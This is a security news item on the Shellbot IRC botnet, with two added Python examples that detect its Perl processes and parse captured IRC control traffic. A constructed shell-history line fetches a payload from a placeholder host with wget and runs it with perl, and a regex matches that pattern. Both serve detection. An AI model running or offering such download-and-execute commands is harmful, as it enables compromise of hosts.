Government of the Republic of Trinidad and Tobago

Shellbot Botnet Targets Linux, Android Devices

5th November 2018

An IRC bot written in Perl is targeting Internet of Things (IoT) devices and Linux servers, but can also affect Windows systems and Android devices, Trend Micro warns.

Dubbed Shellbot, the malware is distributed by a threat group called Outlaw, which recently compromised FTP servers belonging to a Japanese art institution and a Bangladeshi government site. The attackers linked the compromised servers into a high-availability cluster to host an IRC bouncer and control the botnet.

Previously, the botnet was distributed via an exploit for the Shellshock vulnerability, hence its name. Last month, IBM observed attacks exploiting the Drupalgeddon2 vulnerability (CVE-2018-7600) to distribute the botnet.

The campaign Trend Micro's researchers investigated, however, used previously brute-forced or otherwise compromised hosts for distribution. The bot was observed targeting Ubuntu and Android devices.

By examining the botnet's command-and-control (C&C) traffic, the researchers recovered the IRC channel's details and found around 142 hosts in the channel at the time of the first infection.

To infect a host, the malware first runs a command on the target to verify that it accepts commands from the command-line interface (CLI). Next, it changes the working directory to "/tmp" and runs the downloaded payload with the Perl interpreter. In the final step, the payload file is removed, so what remains on a compromised host is a running Perl process rather than a file on disk.
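The infection chain above suggests two host-side checks. The following is an added example written for this page, not code from the article or from Trend Micro: it flags Perl processes whose script lives in a temporary directory or has already been deleted, and shell-history lines with the download, run, delete shape. The process snapshot, file list and history lines are constructed for illustration.

```python
"""Added detection example, not code from the article or from Trend Micro's
report. It turns the infection chain the article describes (change to /tmp,
run the downloaded payload with perl, delete the payload) into two host checks:
perl processes whose script sits in a temporary directory or no longer exists
on disk, and shell-history lines with the download-run-delete one-liner shape.
All process, file and history data below is constructed."""
import os
import re

TEMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")

# Constructed snapshot of what /proc/<pid>/cwd and /proc/<pid>/cmdline would show.
# pid 3187 models the bot after its dropper removed the payload file.
SAMPLE_PROCESSES = [
    {"pid": 1021, "user": "root", "cwd": "/", "cmdline": ["/usr/sbin/sshd", "-D"]},
    {"pid": 2210, "user": "www-data", "cwd": "/var/www", "cmdline": ["perl", "/var/www/cgi-bin/report.pl"]},
    {"pid": 3187, "user": "www-data", "cwd": "/tmp", "cmdline": ["perl", "/tmp/.x/y.pl"]},
    {"pid": 3302, "user": "ubuntu", "cwd": "/tmp", "cmdline": ["/usr/bin/perl", "-e", "print 1"]},
]
SAMPLE_FILES = {"/var/www/cgi-bin/report.pl"}  # constructed: script files still on disk

# Constructed shell history; the second line has the dropper's shape.
SAMPLE_HISTORY = [
    "ls -la",
    "cd /tmp; wget -q http://203.0.113.10/x.txt -O .x; perl .x; rm -f .x",
    "cd /var/www && git pull",
    "curl -s https://203.0.113.10/health",
]

# cd into a temp dir, then a downloader, then perl, all on one line
DROPPER_RE = re.compile(r"cd\s+(?:/var)?/tmp\b.*\b(?:wget|curl)\b.*\bperl\b", re.IGNORECASE)


def _in_temp_dir(path):
    return any(path == d or path.startswith(d + "/") for d in TEMP_DIRS)


def _script_path(argv):
    """Return the script argument of a perl command line, or None for inline -e/-E code."""
    for arg in argv[1:]:
        if arg in ("-e", "-E"):
            return None
        if not arg.startswith("-"):
            return arg
    return None


def suspicious_perl_processes(processes, existing_files):
    """Flag perl processes matching the article's chain; returns findings sorted by pid."""
    findings = []
    for proc in processes:
        argv = proc["cmdline"]
        if not argv or os.path.basename(argv[0]) != "perl":
            continue
        reasons = []
        if _in_temp_dir(proc["cwd"]):
            reasons.append("cwd in temp dir")
        script = _script_path(argv)
        if script is None:
            if any(a in ("-e", "-E") for a in argv):
                reasons.append("inline -e code")
        else:
            full = script if script.startswith("/") else os.path.join(proc["cwd"], script)
            if _in_temp_dir(full):
                reasons.append("script in temp dir")
            if full not in existing_files:
                reasons.append("script file deleted")  # payload removed after launch
        if reasons:
            high = {"script in temp dir", "script file deleted"} & set(reasons)
            findings.append({"pid": proc["pid"], "user": proc["user"],
                             "severity": "high" if high else "low", "reasons": reasons})
    return sorted(findings, key=lambda f: f["pid"])


def suspicious_history_lines(lines):
    """Return history lines that chain cd /tmp, a downloader and perl."""
    return [line for line in lines if DROPPER_RE.search(line)]


if __name__ == "__main__":
    for finding in suspicious_perl_processes(SAMPLE_PROCESSES, SAMPLE_FILES):
        print(finding)
    for line in suspicious_history_lines(SAMPLE_HISTORY):
        print("history:", line)
```

On a live host the same functions can be fed from `/proc/<pid>/cwd`, `/proc/<pid>/cmdline` and `os.path.exists`. One caveat: a Perl script can rewrite its own command line by assigning to `$0`, so a process check like this should be paired with the network-side view of the IRC traffic.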

Once the Shellbot backdoor is running on the infected system, the IRC channel's administrator can send commands to the host to perform port scans and various forms of distributed denial of service (DDoS), download a file, gather information about other machines, or report operating system (OS) information and a list of certain running processes.
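The channel details and host count mentioned earlier, and the operator commands described above, can be recovered from a capture of the bot's IRC session. The following is an added example written for this page, not code from the article, Trend Micro or the malware: a small IRC line parser that extracts the joined channel, the nicks listed in the NAMES reply, and messages from channel operators that look like commands. The session is constructed; the bracketed OS tag in bot nicks and the "!bot" command syntax are hypothetical conventions, not Shellbot's documented protocol.

```python
"""Added example, not code from the article or from Trend Micro's report:
recover the channel name, the members present at join time and the commands
issued by a channel operator from a captured IRC control session, the kind of
C&C traffic analysis the article describes. The session below is constructed;
the bot nick convention and the '!bot' command syntax are hypothetical."""
from collections import Counter, namedtuple

IrcMsg = namedtuple("IrcMsg", "prefix command params trailing")

# Constructed session: client lines have no prefix, server lines start with ':'.
SAMPLE_SESSION = [
    "NICK [Linux]abc123",
    "USER abc123 8 * :abc123",
    ":irc.example.net 001 [Linux]abc123 :Welcome",
    "JOIN #ctrl",
    ":irc.example.net 353 [Linux]abc123 = #ctrl :@admin [Linux]abc123 [Linux]def456 [Android]ghi789",
    ":irc.example.net 353 [Linux]abc123 = #ctrl :[Linux]jkl012 [Ubuntu]mno345",
    ":irc.example.net 366 [Linux]abc123 #ctrl :End of /NAMES list.",
    ":admin!op@example.net PRIVMSG #ctrl :!bot @portscan 203.0.113.5",
    ":admin!op@example.net PRIVMSG #ctrl :!bot @udpflood 203.0.113.5 80 60",
    ":[Linux]def456!bot@198.51.100.7 PRIVMSG #ctrl :scan finished",
    ":admin!op@example.net PRIVMSG #ctrl :!bot @system",
]


def parse_irc_line(line):
    """Split an RFC 1459 line into prefix, command, middle params and trailing."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    parts = line.split()
    if not parts:
        return IrcMsg(prefix, "", [], trailing)
    return IrcMsg(prefix, parts[0].upper(), parts[1:], trailing)


def analyse_session(lines):
    """Return channel, members, operators and operator commands seen in the capture."""
    channel = None
    members, operators, commands = set(), set(), []
    for raw in lines:
        msg = parse_irc_line(raw)
        if msg.command == "JOIN" and msg.prefix is None:
            channel = msg.params[0] if msg.params else msg.trailing
        elif msg.command == "353" and msg.trailing:  # RPL_NAMREPLY, may span several lines
            for nick in msg.trailing.split():
                bare = nick.lstrip("~&@%+")  # strip channel-mode prefixes
                members.add(bare)
                if nick.startswith(("~", "&", "@")):  # owner, admin or op
                    operators.add(bare)
        elif msg.command == "PRIVMSG" and msg.prefix and msg.params:
            sender = msg.prefix.split("!", 1)[0]
            if (msg.params[0] == channel and sender in operators
                    and msg.trailing and msg.trailing.startswith("!")):
                commands.append((sender, msg.trailing))
    return {"channel": channel, "members": members,
            "operators": operators, "commands": commands}


def platform_breakdown(members):
    """Count members by a bracketed OS tag in the nick ([Linux]x -> Linux); hypothetical convention."""
    tags = Counter()
    for nick in members:
        if nick.startswith("[") and "]" in nick:
            tags[nick[1:nick.index("]")]] += 1
        else:
            tags["untagged"] += 1
    return tags


if __name__ == "__main__":
    result = analyse_session(SAMPLE_SESSION)
    print(result["channel"], len(result["members"]), "members", platform_breakdown(result["members"]))
    for sender, cmd in result["commands"]:
        print(sender, "->", cmd)
```

In practice the input would be the reassembled TCP stream of the bot's connection to the IRC server (or the bouncer the article mentions), split on CRLF; counting the 353 replies at join time is how a figure like the 142 hosts in the article is obtained.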

The researchers also found that the attackers frequently changed the files hosted on the C&C server. Files were modified, deleted and added mostly during daytime in Central European Time (CET), and never at night or on weekends.

The use of an IRC bot isn't a novel tactic, especially since the code used in these attacks is available online, Trend Micro notes. The operation targeted large companies, but the group hasn't engaged in widespread attacks, the researchers also point out.